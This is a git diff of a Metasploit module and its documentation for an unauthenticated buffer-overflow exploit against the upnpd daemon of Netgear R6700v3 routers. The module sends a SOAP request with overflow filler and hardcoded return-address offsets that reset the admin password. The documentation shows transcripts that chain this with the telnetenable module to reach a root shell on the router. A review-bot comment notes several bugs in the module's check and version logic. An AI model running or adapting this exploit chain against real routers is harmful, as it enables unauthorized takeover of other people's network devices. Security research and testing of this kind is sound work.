diff --git a/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md b/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md index fb12718a19..208bc6b3f9 100644 --- a/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md +++ b/documentation/modules/auxiliary/admin/http/netgear_r6700_pass_reset.md @@ -1,7 +1,7 @@ -## Description +## Vulnerable Application -This module exploits a buffer overflow vulnerability in the upnpd daemon (/usr/sbin/upnpd), running on the -router Netgear R6700v3, ARM Architecture, firmware version V1.0.4.82_10.0.57 and V1.0.4.84_10.0.58 to reset the password +This module exploits a buffer overflow vulnerability in the upnpd daemon (/usr/sbin/upnpd), running on the +router Netgear R6700v3, ARM Architecture, firmware version V1.0.4.82_10.0.57 and V1.0.4.84_10.0.58 to reset the password of the "admin" user on affected systems back to its factory default of "password". Support for other versions has not been added due to time constraints; users are encouraged to refer to the advisory for details on how to update the offset to the admin password reset functionality to support other firmware versions. @@ -12,7 +12,7 @@ will crash the upnpd daemon and it will not restart, so attackers can only explo of the router. After using this module, to achieve code execution, do the following steps manually: 1. Login to 192.168.1.1 with creds 'admin:password', then: - * go to Advanced -> Administration -> Set Password + * Go to Advanced -> Administration -> Set Password * Change the password from 'password' to 2. Run metasploit as root, then: * use exploit/linux/telnet/netgear_telnetenable 
@@ -25,13 +25,11 @@ of the router. After using this module, to achieve code execution, do the follow This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the team Flashback (Pedro Ribeiro + Radek Domanski). -## Vulnerable Application - +Vulnerable firmware versions can be downloaded using the following links: * [Netgear R6700v3 firmware version V1.0.4.82_10.0.57](http://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.82_10.0.57.zip) * [Netgear R6700v3 firmware version V1.0.4.84_10.0.58](http://www.downloads.netgear.com/files/GDC/R6700v3/R6700v3-V1.0.4.84_10.0.58.zip) ## Verification Steps - Example steps in this format: 1. Connect the R6700v3 router to your local area network and ensure you can access it. 2. Browse to the admin portal for the router, which will be located by default at `http://192.168.1.1`. @@ -43,7 +41,7 @@ This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the tea 8. Set RHOST 9. Run ```check``` and verify that the target is vulnerable. 10. Do: ```run``` - 11. Browse admin portal for the router, and + 11. Browse admin portal for the router, and verify you can successfully log in with the username `admin` and the password `password`. ## Options @@ -52,7 +50,7 @@ This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the tea IP address of the LAN interface of the vulnerable target. -### RPORT +### RPORT upnpd port on the target. Default 5000. 
@@ -61,110 +59,216 @@ upnpd port on the target. Default 5000. ### Netgear R6700v3 firmware version V1.0.4.84_10.0.58 ``` -msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOST 192.168.1.1 -RHOST => 192.168.1.1 -msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check + msf5 > use auxiliary/admin/http/netgear_r6700_pass_reset + msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options + + Module options (auxiliary/admin/http/netgear_r6700_pass_reset): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] + RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' + RPORT 5000 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + VHOST no HTTP server virtual host + + msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1 + RHOSTS => 192.168.1.1 + msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check + + [*] Target is running firmware version 1.0.4.84 + [*] 192.168.1.1:5000 - The target appears to be vulnerable. + msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit + [*] Running module against 192.168.1.1 + + [*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target. + [+] 192.168.1.1:5000 - HTTP payload sent! 
'admin' password has been reset to 'password' + [*] To achieve code execution, do the following steps manually: + [*] 1- Login to 192.168.1.1 with creds 'admin:password', then: + [*] 1.1- go to Advanced -> Administration -> Set Password + [*] 1.2- Change the password from 'password' to + [*] 2- Run metasploit as root, then: + [*] 2.1- use exploit/linux/telnet/netgear_telnetenable + [*] 2.2- set interface + [*] 2.3- set rhost 192.168.1.1 + [*] 2.3- set username admin + [*] 2.4- set password + [*] 2.5- OPTIONAL: set timeout 1500 + [*] 2.6- OPTIONAL: set MAC + [*] 2.7- run it and login with 'admin:' + [*] 3- Enjoy your root shell! + [*] Auxiliary module execution completed + msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > +``` -[*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target. -[+] 192.168.1.1:5000 - The target is vulnerable. - -msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > run -[*] Running module against 192.168.1.1 - -[*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target. -[+] 192.168.1.1:5000 - HTTP payload sent! 'admin' password has been reset to 'password' -[*] To achieve code execution, do the following steps manually: -[*] 1- Login to 192.168.1.1 with creds 'admin:password', then: -[*] 1.1- go to Advanced -> Administration -> Set Password -[*] 1.2- Change the password from 'password' to -[*] 2- Run metasploit as root, then: -[*] 2.1- use exploit/linux/telnet/netgear_telnetenable -[*] 2.2- set interface -[*] 2.3- set rhost 192.168.1.1 -[*] 2.3- set username admin -[*] 2.4- set password -[*] 2.5- run it and login with 'admin:' -[*] 3- Enjoy your root shell! 
-[*] Auxiliary module execution completed -msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > use exploit/linux/telnet/netgear_telnetenable -msf5 exploit(linux/telnet/netgear_telnetenable) > ifconfig | grep enx -[*] exec: ifconfig | grep enx - -enxd03745775fdd: flags=4163 mtu 1500 -msf5 exploit(linux/telnet/netgear_telnetenable) > set interface enxd03745775fdd -interface => enxd03745775fdd -msf5 exploit(linux/telnet/netgear_telnetenable) > set rhost 192.168.1.1 -rhost => 192.168.1.1 -msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin -username => admin -msf5 exploit(linux/telnet/netgear_telnetenable) > set password Flashback -password => Flashback -msf5 exploit(linux/telnet/netgear_telnetenable) > set timeout 1500 -timeout => 1500 -msf5 exploit(linux/telnet/netgear_telnetenable) > run - -[+] 192.168.1.1:23 - Detected telnetenabled on UDP -[*] 192.168.1.1:23 - Attempting to discover MAC address via ARP -[+] 192.168.1.1:23 - Found MAC address -[+] 192.168.1.1:23 - Using creds admin:Flashback -[*] 192.168.1.1:23 - Generating magic packet -[*] 192.168.1.1:23 - Connecting to telnetenabled via UDP -[*] 192.168.1.1:23 - Sending magic packet -[*] 192.168.1.1:23 - Disconnecting from telnetenabled -[*] 192.168.1.1:23 - Waiting for telnetd -[*] 192.168.1.1:23 - Connecting to telnetd -[*] Found shell. -[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.1:23) at 2020-06-22 17:52:25 +0200 - - login: admin -admin -Password: Flashback - - - -BusyBox v1.7.2 (2019-10-19 12:12:12 CST) built-in shell (ash) -Enter 'help' for a list of built-in commands. 
- -# id -id -uid=0(admin) gid=0(root) -# uname -a -uname -a -Linux R6700v3 2.6.36.4brcmarm+ #17 SMP PREEMPT Sat Oct 19 11:17:27 CST 2019 armv7l unknown +Browsed to admin page and changed password to `testing123`, then in a new `msfconsole` +session running as `root`, entered the following commands: +``` + msf5 > use exploit/linux/telnet/netgear_telnetenable + [*] No payload configured, defaulting to cmd/unix/interact + msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin + username => admin + msf5 exploit(linux/telnet/netgear_telnetenable) > set password testing123 + password => testing123 + msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9 + MAC => D56C89FC94C9 + msf5 exploit(linux/telnet/netgear_telnetenable) > set RHOSTS 192.168.1.1 + RHOSTS => 192.168.1.1 + msf5 exploit(linux/telnet/netgear_telnetenable) > exploit + + [+] 192.168.1.1:23 - Detected telnetenabled on UDP + [+] 192.168.1.1:23 - Using creds admin:testing123 + [*] 192.168.1.1:23 - Generating magic packet + [*] 192.168.1.1:23 - Connecting to telnetenabled via UDP + [*] 192.168.1.1:23 - Sending magic packet + [*] 192.168.1.1:23 - Disconnecting from telnetenabled + [*] 192.168.1.1:23 - Waiting for telnetd + [*] 192.168.1.1:23 - Connecting to telnetd + [*] Found shell. + [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.1:23) at 2020-06-30 15:57:33 -0500 + + + + Login incorrect + login: admin + admin + Password: testing123 + + + + BusyBox v1.7.2 (2019-10-19 12:12:12 CST) built-in shell (ash) + Enter 'help' for a list of built-in commands. 
+ + # id + id + uid=0(admin) gid=0(root) + # uname -a + uname -a + Linux R6700v3 2.6.36.4brcmarm+ #17 SMP PREEMPT Sat Oct 19 11:17:27 CST 2019 armv7l unknown + # ``` ### Netgear R6700v3 firmware version V1.0.0.4.82_10.0.57 ``` -msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options - -Module options (auxiliary/admin/http/netgear_r6700_pass_reset): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - Proxies no A proxy chain of format type:host:port[,type:host:port][...] - RHOSTS 192.168.1.1 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' - RPORT 5000 yes The target port (TCP) - SSL false no Negotiate SSL/TLS for outgoing connections - VHOST no HTTP server virtual host - -msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit -[*] Running module against 192.168.1.1 - -[*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.82_10.0.57) as the target. -[+] 192.168.1.1:5000 - HTTP payload sent! 'admin' password has been reset to 'password' -[*] To achieve code execution, do the following steps manually: -[*] 1- Login to 192.168.1.1 with creds 'admin:password', then: -[*] 1.1- go to Advanced -> Administration -> Set Password -[*] 1.2- Change the password from 'password' to -[*] 2- Run metasploit as root, then: -[*] 2.1- use exploit/linux/telnet/netgear_telnetenable -[*] 2.2- set interface -[*] 2.3- set rhost 192.168.1.1 -[*] 2.3- set username admin -[*] 2.4- set password -[*] 2.5- run it and login with 'admin:' -[*] 3- Enjoy your root shell! -[*] Auxiliary module execution completed + msf5 > use auxiliary/admin/http/netgear_r6700_pass_reset + msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > show options + + Module options (auxiliary/admin/http/netgear_r6700_pass_reset): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format type:host:port[,type:host:port][...] 
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' + RPORT 5000 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgoing connections + VHOST no HTTP server virtual host + + msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > set RHOSTS 192.168.1.1 + RHOSTS => 192.168.1.1 + msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > check + + [*] Target is running firmware version 1.0.4.82 + [*] 192.168.1.1:5000 - The target appears to be vulnerable. + msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > exploit + [*] Running module against 192.168.1.1 + + [*] 192.168.1.1:5000 - Identified Netgear R6700v3 (firmware V1.0.0.4.82_10.0.57) as the target. + [+] 192.168.1.1:5000 - HTTP payload sent! 'admin' password has been reset to 'password' + [*] To achieve code execution, do the following steps manually: + [*] 1- Login to 192.168.1.1 with creds 'admin:password', then: + [*] 1.1- go to Advanced -> Administration -> Set Password + [*] 1.2- Change the password from 'password' to + [*] 2- Run metasploit as root, then: + [*] 2.1- use exploit/linux/telnet/netgear_telnetenable + [*] 2.2- set interface + [*] 2.3- set rhost 192.168.1.1 + [*] 2.3- set username admin + [*] 2.4- set password + [*] 2.5- OPTIONAL: set timeout 1500 + [*] 2.6- OPTIONAL: set MAC + [*] 2.7- run it and login with 'admin:' + [*] 3- Enjoy your root shell! 
+ [*] Auxiliary module execution completed + msf5 auxiliary(admin/http/netgear_r6700_pass_reset) > +``` + +Browsed to admin page and changed password to `testing123`, then in a new `msfconsole` +session running as `root`, entered the following commands: + +``` + msf5 > use exploit/linux/telnet/netgear_telnetenable + [*] No payload configured, defaulting to cmd/unix/interact + msf5 exploit(linux/telnet/netgear_telnetenable) > show options + + Module options (exploit/linux/telnet/netgear_telnetenable): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + FILTER no The filter string for capturing traffic + INTERFACE no The name of the interface + MAC no MAC address of device + PASSWORD no Password on device + PCAPFILE no The name of the PCAP capture file to process + RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' + RPORT 23 yes The target port (TCP) + SNAPLEN 65535 yes The number of bytes to capture + TIMEOUT 500 yes The number of seconds to wait for new data + USERNAME no Username on device + + + Payload options (cmd/unix/interact): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + + + Exploit target: + + Id Name + -- ---- + 0 Automatic (detect TCP or UDP) + + + msf5 exploit(linux/telnet/netgear_telnetenable) > set RHOST 192.168.1.1 + RHOST => 192.168.1.1 + set msf5 exploit(linux/telnet/netgear_telnetenable) > set username admin + username => admin + msf5 exploit(linux/telnet/netgear_telnetenable) > set password testing123 + password => testing123 + msf5 exploit(linux/telnet/netgear_telnetenable) > set MAC D56C89FC94C9 + MAC => D56C89FC94C9 + msf5 exploit(linux/telnet/netgear_telnetenable) > exploit + + [+] 192.168.1.1:23 - Detected telnetenabled on UDP + [+] 192.168.1.1:23 - Using creds admin:testing123 + [*] 192.168.1.1:23 - Generating magic packet + [*] 192.168.1.1:23 - Connecting to telnetenabled via UDP + [*] 192.168.1.1:23 - Sending magic 
packet + [*] 192.168.1.1:23 - Disconnecting from telnetenabled + [*] 192.168.1.1:23 - Waiting for telnetd + [*] 192.168.1.1:23 - Connecting to telnetd + [*] Found shell. + [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.1.1:23) at 2020-06-30 15:14:08 -0500 + + + + Login incorrect + login: admin + admin + Password: testing123 + + + + BusyBox v1.7.2 (2019-07-29 20:56:07 CST) built-in shell (ash) + Enter 'help' for a list of built-in commands. + + # id + id + uid=0(admin) gid=0(root) + # uname -a + uname -a + Linux R6700v3 2.6.36.4brcmarm+ #17 SMP PREEMPT Mon Jul 29 19:43:55 CST 2019 armv7l unknown + # ``` diff --git a/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb b/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb index 8861a78b8b..c9292230e5 100644 --- a/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb +++ b/modules/auxiliary/admin/http/netgear_r6700_pass_reset.rb 
@@ -10,36 +10,36 @@ class MetasploitModule < Msf::Auxiliary super( update_info( info, - 'Name' => 'Netgear R6700v3 Unauthenticated LAN Admin Password Reset', - 'Description' => %q{ - This module exploits a buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd), running on - the router Netgear R6700 Nighthawk, hardware version 3, ARM Architecture, firmware versions V1.0.0.4.82_10.0.57 - and V1.0.0.4.84_10.0.58. + 'Name' => 'Netgear R6700v3 Unauthenticated LAN Admin Password Reset', + 'Description' => %q{ + This module exploits a buffer overflow vulnerability in the UPNP daemon (/usr/sbin/upnpd), running on + the router Netgear R6700 Nighthawk, hardware version 3, ARM Architecture, firmware versions V1.0.0.4.82_10.0.57 + and V1.0.0.4.84_10.0.58. - The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does - not need any authentication to abuse it. After exploitation, an attacker can hijack execution of the upnpd binary, - and reset the router's administrative password to the factory default of "password". + The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does + not need any authentication to abuse it. After exploitation, an attacker can hijack execution of the upnpd binary, + and reset the router's administrative password to the factory default of "password". - Once this is done, attackers can use the exploit/linux/telnet/netgear_telnetenable module to send a - special packet to port 23/udp of the router to enable a telnet server on port 23/tcp. The attacker can - then log into this telnet server using the new password, and obtain a shell as the "root" user. + Once this is done, attackers can use the exploit/linux/telnet/netgear_telnetenable module to send a + special packet to port 23/udp of the router to enable a telnet server on port 23/tcp. 
The attacker can + then log into this telnet server using the new password, and obtain a shell as the "root" user. - These last two steps have to be done manually, as the authors did not reverse the communication with the web interface. - It should be noted that successful exploitation will result in the upnpd binary crashing on the target router. - As the upnpd binary will not restart until the router is rebooted, this means that attackers can only exploit - this vulnerability once per reboot of the router. + These last two steps have to be done manually, as the authors did not reverse the communication with the web interface. + It should be noted that successful exploitation will result in the upnpd binary crashing on the target router. + As the upnpd binary will not restart until the router is rebooted, this means that attackers can only exploit + this vulnerability once per reboot of the router. - This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro + - Radek Domanski). + This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro + + Radek Domanski). }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ 'Pedro Ribeiro ', # Twitter: @pedrib1337. Vulnerability discovery and Metasploit module 'Radek Domanski ', # Twitter: @RabbitPro. Vulnerability discovery and Metasploit module 'gwillcox-r7' # Minor general updates plus updated implementation of the check method to identify a wider range of vulnerable targets. ], - 'References' => + 'References' => [ [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/tokyo_drift/tokyo_drift.md'], [ 'URL', 'https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders'], 
@@ -48,118 +48,119 @@ class MetasploitModule < Msf::Auxiliary [ 'ZDI', '20-704'] ], 'Notes' => # Note that reliability isn't included here, as technically the exploit can only - # only be run once, after which the service crashes. + # only be run once, after which the service crashes. { - 'SideEffects' => [ CONFIG_CHANGES ], # This module will change the configuration by - # resetting the router to the default factory password. - 'Stability' => [ CRASH_SERVICE_DOWN ] # This module will crash the target service after it is run. + 'SideEffects' => [ CONFIG_CHANGES ], # This module will change the configuration by + # resetting the router to the default factory password. + 'Stability' => [ CRASH_SERVICE_DOWN ] # This module will crash the target service after it is run. }, 'RelatedModules' => [ 'exploit/linux/telnet/netgear_telnetenable' ], # This module relies on users also running exploit/linux/telnet/netgear_telnetenable to get the shell. - 'DisclosureDate' => "Jun 15 2020", - 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jun 15 2020', + 'DefaultTarget' => 0 ) ) register_options( [ Opt::RPORT(5000) - ]) + ] + ) end - def get_version + def retrieve_version soap = - ""\ - "\r\n"\ - "\r\n"\ - "\r\nSetDeviceNameIconByMAC"\ - "\r\n1"\ - "\r\n"\ - "\r\n"\ - "\r\n" + ''\ + "\r\n"\ + "\r\n"\ + "\r\nSetDeviceNameIconByMAC"\ + "\r\n1"\ + "\r\n"\ + "\r\n"\ + "\r\n" # the GetInfo method will helpfully report the firmware version to an unauth request - headers = "SOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo" + headers = 'SOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#GetInfo' res = send_request_cgi({ 'uri' => '/soap/server_sa', - 'method' => 'POST', - 'raw_headers' => headers, - 'data' => soap + 'method' => 'POST', + 'raw_headers' => headers, + 'data' => soap }) - if (res == nil) + if res.nil? 
fail_with(Failure::Unreachable, "Failed to obtain device version: Target didn't respond")
- elsif (res.body.to_s == "") or (res.code != 200)
- fail_with(Failure::UnexpectedReply, "Failed to obtain device version: Unexpected response code")
+ elsif (res.body.to_s == '') || (res.code != 200)
+ fail_with(Failure::UnexpectedReply, 'Failed to obtain device version: Unexpected response code')
 end
 version = res.body.to_s
 version = version.scan(/V\d\.\d\.\d\.\d{1,2}/) # Try find a version number in the format V1.2.3.48 or similar.
- if (version == nil) # Check we actually got a result.
- fail_with(Failure::UnexpectedReply, "Failed to obtain device version: no version number found in response") # Taken from https://stackoverflow.com/questions/4115115/extract-a-substring-from-a-string-in-ruby-using-a-regular-expression
+ if version.nil? # Check we actually got a result.
+ fail_with(Failure::UnexpectedReply, 'Failed to obtain device version: no version number found in response') # Taken from https://stackoverflow.com/questions/4115115/extract-a-substring-from-a-string-in-ruby-using-a-regular-expression
 end
- raw_version_number = version[0].gsub("V", "") # If we got a result, then take the first result from the returned array, and remove the leading 'V'.
+ raw_version_number = version[0].gsub('V', '') # If we got a result, then take the first result from the returned array, and remove the leading 'V'.
 Gem::Version.new(raw_version_number) # Finally lets turn it into a Gem::Version object for later use in other parts of the code. 
end
 def check
- target_version = get_version
+ target_version = retrieve_version
 print_status("Target is running firmware version #{target_version}")
- if (target_version < Gem::Version.new("1.0.4.94")) && (target_version >= Gem::Version.new("1.0.2.62"))
+ if (target_version < Gem::Version.new('1.0.4.94')) && (target_version >= Gem::Version.new('1.0.2.62'))
 return Exploit::CheckCode::Appears
 else
 return Exploit::Checkcode::Safe
 end
 end
- def get_offset
- target_version = get_version
+ def find_offset
+ target_version = retrieve_version
 if target_version == Gem::Version.new('1.0.4.84')
 print_status("#{peer} - Identified Netgear R6700v3 (firmware V1.0.0.4.84_10.0.58) as the target.")
 # this offset is where execution will jump to
 # a part in the middle of the binary that resets the admin password
 return "\x58\x9a\x03"
- elsif target_version == Gem::Version.new("1.0.4.82")
+ elsif target_version == Gem::Version.new('1.0.4.82')
 print_status("#{peer} - Identified Netgear R6700v3 (firmware V1.0.0.4.82_10.0.57) as the target.")
 return "\x48\x9a\x03"
 end
 end
 def run
- offset = get_offset
- if not offset
- fail_with(Failure::NoTarget, "Identified firmware version is not supported. Please contact the authors.")
+ offset = find_offset
+ if !offset
+ fail_with(Failure::NoTarget, 'Identified firmware version is not supported. 
Please contact the authors.') end headers = - "SOAPAction: urn:NETGEAR-ROUTER:service:DeviceConfig:1#SOAPLogin\nSOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#Whatever" + "SOAPAction: urn:NETGEAR-ROUTER:service:DeviceConfig:1#SOAPLogin\nSOAPAction: urn:NETGEAR-ROUTER:service:DeviceInfo:1#Whatever" payload = - ""\ - "\r\n"\ - "\r\n"\ - "\r\nSetDeviceNameIconByMAC"\ - "\r\n1" + ''\ + "\r\n"\ + "\r\n"\ + "\r\nSetDeviceNameIconByMAC"\ + "\r\n1" # filler - payload += Rex::Text::rand_text_alpha(1028) + payload += Rex::Text.rand_text_alpha(1028) # $r4 - payload += Rex::Text::rand_text_alpha(4) + payload += Rex::Text.rand_text_alpha(4) # $r5 - payload += Rex::Text::rand_text_alpha(4) + payload += Rex::Text.rand_text_alpha(4) # $r6 - payload += Rex::Text::rand_text_alpha(4) + payload += Rex::Text.rand_text_alpha(4) # $r7 - payload += Rex::Text::rand_text_alpha(4) + payload += Rex::Text.rand_text_alpha(4) # $r8 - payload += Rex::Text::rand_text_alpha(4) + payload += Rex::Text.rand_text_alpha(4) # $lr (AKA return address) payload += offset # trailer payload += - "\r\n"\ - "\r\n"\ - "\r\n" + "\r\n"\ + "\r\n"\ + "\r\n" headers.gsub! "\n", "\r\n" payload.gsub! "\n", "\r\n" @@ -170,9 +171,9 @@ class MetasploitModule < Msf::Auxiliary res = send_request_cgi({ 'uri' => '/soap/server_sa', - 'method' => 'POST', - 'raw_headers' => headers, - 'data' => payload + 'method' => 'POST', + 'raw_headers' => headers, + 'data' => payload }) if res 
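Review bot: In `check`, the non-vulnerable branch returns `Exploit::Checkcode::Safe`, which is not the constant's name (`CheckCode`), so any target whose version falls outside the window raises a NameError instead of reporting Safe; it should read `return Exploit::CheckCode::Safe`. A second guard in `retrieve_version` is dead: `String#scan` never returns nil but an empty array on no match, so `if version.nil?` never fires and the following `version[0].gsub('V', '')` raises NoMethodError on an unexpected body — `if version.empty?` is the check that was intended, and both lines are context here so the style pass left them untouched. `check` also reports Appears for every version in [1.0.2.62, 1.0.4.94) while `find_offset` only carries offsets for 1.0.4.82 and 1.0.4.84, so `run` fails with NoTarget on most versions the check marks as vulnerable; either narrow the window or say so in the description. The firmware strings printed by `find_offset` (`V1.0.0.4.84_10.0.58`) carry an extra `.0` compared with the values the code compares against and the versions named in the documentation (`V1.0.4.84_10.0.58`); presumably the printed strings are the typo and should be aligned.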
@@ -180,11 +181,11 @@ class MetasploitModule < Msf::Auxiliary fail_with(Failure::UnexpectedReply, 'Failed to send HTTP payload... try again?') else print_good("#{peer} - HTTP payload sent! 'admin' password has been reset to 'password'") - print_status("To achieve code execution, do the following steps manually:") + print_status('To achieve code execution, do the following steps manually:') print_status("1- Login to #{rhost} with creds 'admin:password', then:") print_status("\t1.1- go to Advanced -> Administration -> Set Password") print_status("\t1.2- Change the password from 'password' to ") - print_status("2- Run metasploit as root, then:") + print_status('2- Run metasploit as root, then:') print_status("\t2.1- use exploit/linux/telnet/netgear_telnetenable") print_status("\t2.2- set interface ") print_status("\t2.3- set rhost #{rhost}") @@ -193,7 +194,7 @@ class MetasploitModule < Msf::Auxiliary print_status("\t2.5- OPTIONAL: set timeout 1500") print_status("\t2.6- OPTIONAL: set MAC ") print_status("\t2.7- run it and login with 'admin:'") - print_status("3- Enjoy your root shell!") + print_status('3- Enjoy your root shell!') end end end